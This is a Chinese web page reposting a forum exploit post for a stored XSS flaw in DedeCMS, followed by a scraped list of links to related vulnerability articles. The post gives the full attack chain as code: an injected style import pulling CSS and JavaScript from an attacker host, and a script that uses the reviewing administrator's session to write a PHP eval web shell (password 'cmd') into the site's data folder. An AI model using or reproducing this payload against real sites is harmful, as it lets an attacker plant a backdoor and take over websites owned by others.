dedecms xss oday通杀所有版本 可getshell
dedecms xss oday通杀所有版本(T00ls首发) by haris
作者:haris
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿
注册会员----发表文章
内容填写:
<style>@im/port'/http://xxx.com/xss.css';</style>
新建xss.css,内容:
body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")')
}
新建xss.js文件,内容:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split('/')
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){
var url= "/"+u+"/sys_sql_query.php";
var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);
}
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
dedecms xss oday通杀所有版本 可getshell相关推荐
- thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...
- 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...
- /plus/recommend.php sql注入漏洞,代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法 | Seay 渗透 编程 代码审计 网络安全博客...
显示不全请点击全屏阅读 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商 ...
- 用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)
用友TurboCRM存在通用sql注入.http://**.**.**.**:8081/login/login.php如下图找到找回密码页 访问http://**.**.**.**:8081/logi ...
- php去除正方教务空格,通用型正方教务(通杀各版本)存在注入(不需
某个接口页面存在oracle盲注,可以获得当前用户数据库,dump教师用户表,分析密文加密特征(前人研究成果+基友助攻),破译加密的密码.前台管理员登陆,后台文件上传基于黑名单原理,过滤u完全,上传特 ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...
- 漏洞进阶之——XSS万能超级无敌全通杀payload
XSS万能超级无敌全通杀payload XSS 漏洞简介 payload--on,js事件 payload--标签 payload--过狗过墙思路 本人常用payload分享 ------------ ...
- V5shop 8.2版本下通杀注入漏洞
漏洞危害:高危 一.漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select T ...
最新文章
- centOS Redhat yum的配置
- 【博客话题】我与Linux的不解情缘
- Sublime Text 3103 Crack 破解 注册码(亲测有效)
- HashMap与HashTable联系与区别
- 答疑:有关一例EXT3文件系统故障
- 基于jsp+servlet完成的用户注册
- 四步创建TCP客户端
- 色彩艺术海报PSD模板 | 用色彩挑动你的情趣
- 拓端tecdat|R语言用rle,svm和rpart决策树进行时间序列预测
- kindle 新手入门
- 最好最实用的PHP二次开发教程
- 手机软件测试规范(含具体用例)
- 什么是零代码开发平台,为什么企业IT应该重视?
- 学弟想「白嫖」优质大学课,姐直接甩给他 8 个网站
- 智商黑洞(门萨Mensa测试)4
- AT指令集详解[zt]
- Django 新建自定义用户后无法创建表的问题
- CSDN盲盒中奖MacBook Surprise
- pycharm编辑器如何用鼠标滚轮随时放大缩小代码
- 2023第九届中国国际养老服务业博览会5月5日在北京召开
热门文章
- 功率二极管的损耗分析和选型原则
- pascal和python那个好学_从Pascal到Python
- MAXScript脚本用于建筑可视化
- 想进大厂, Jira 管理平台你会用么?
- JS快速解析Excel文件
- 限制html窗口最小宽度,给页面一个最小宽度,小于这个宽度时,出现横向滚动条...
- Jetpack Compose ScrollableTabRow 如何调整最小宽度
- Ruby Jquery 地图,地理信息相关资源
- FX3U PLC源代码,stm32芯片。 全套硬件,软件源码,可以直接用GX Works2编程直接写入。 带读保护版本
- 1D/2D/3D卷积详解